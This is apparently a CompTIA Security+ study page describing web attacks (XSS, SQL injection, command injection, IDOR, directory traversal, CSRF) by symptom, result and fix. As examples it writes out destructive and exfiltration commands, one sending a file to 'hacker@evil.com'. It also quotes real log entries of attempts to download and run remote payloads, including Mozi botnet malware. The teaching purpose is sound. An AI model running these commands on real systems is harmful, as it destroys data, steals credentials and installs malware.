Recognizing Attacks
Name, Symptom, and Result
CompTIA wants you to recognize common attack categories. You need to know simplified descriptions of their symptoms. And, know what they could lead to.
Cross-site Scripting / XSS
Symptom:
A page at "a popular social media site" contains:
<script ...></script>
Possible result:
It tricks your browser into sending an authentication cookie
to a hostile server instead of the appropriate one.
SQL Injection
Symptom:
Log of transactions includes: ' or 1=1; --
or: "Strange punctuation marks"
Possible result:
Literally anything that could be done on a database server.
Deleting database tables, deleting records, changing records,
adding records, and so on.
Command Injection
Symptom:
The web server log contains requests that
include command syntax.
Windows:
format c: /y
type \path\to\sensitive\file
Linux:
rm -rf /
cat /etc/shadow
scp /path/to-sensitive/file hacker@evil.com:
In both operating systems, spaces may be replaced
with %20.
Possible result:
Literally anything.
The above likely examples show deleting entire file system
and exfiltrating sensitive file contents.
Real world example, way too complicated
to appear on the exam.
Here is something from the logs for this site.
The hostile client was 185.239.242.171,
which resolves to scl-00172.mails--servers.org
(as per nslookup or dig),
and is in an IP address belonging to Serverion BV
in the Netherlands (as per whois).
The log entry was:
185.239.242.171 - - [17/Feb/2021:20:14:13 +0000] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`cd /tmp; wget 37.46.150.102/lolol.sh; chmod 777 lolol.sh; sh lolol.sh` HTTP/1.1" 400 150 "-" - -
The client at 185.239.242.171 is trying to trick my server
into downloading and running a program stored on a server
at 37.46.150.102, which resolves to situku.e-conteri.com and
is in a different address block belonging to Serverion BV.
Or there's this far too common attempt to install the
Mozi software on an IoT device running a poorly configured
web server.
It asks to change to /tmp, remove everything
there, and then download and run a program named
Mozi.a with a parameter jaws,
doing all the dirty work.
Spaces are represented by "+":
94.43.10.33 - - [04/Jan/2021:22:56:00 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://94.43.10.33:53251/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 169 "-" - -
Running a command like the following on a web server
is eye-opening:
grep wget /var/www/logs/httpd-access.log
Session Hijacking / Insecure Direct Object References
Symptom:
User Fred notices that when logged in to his bank the URL
includes user=fred, so he changes it to
his friend user=mary and reloads the page,
and sees her data.
Possible result:
Now he's in a session as Mary, so he can do anything that
she could do with her account.
Directory Traversal
Symptom:
Server log includes ../../ in requested URLs.
Possible result:
If the server allows itself to be tricked into climbing
out of the web area, attacker can read and possibly
execute files outside the web area.
Or, maybe they could execute a command! Remember that
%20 encodes ASCII space:
GET ../../../Windows/System32/whatever.exe%20parameter1%20parameter2
GET ../../../Windows/System32/format.com%20c:%20/y
Cross-Site Request Forgery / XSRF / CSRF
Symptom:
Malicious content within a popular page contains a malformed
<img src="..."> object.
Possible result:
A third party is disadvantaged, to the advantage of the
person who dropped that comment into an unfiltered
comment area.
Fixes for All of These
The common problem is that user input is not properly sanitized or validated for size, syntax, or meaning.
Adding or fixing input data validation means modifying software, so always apply patches.
WAFs or Web Application Firewalls know about these, so use one to protect the web front ends to public-facing services.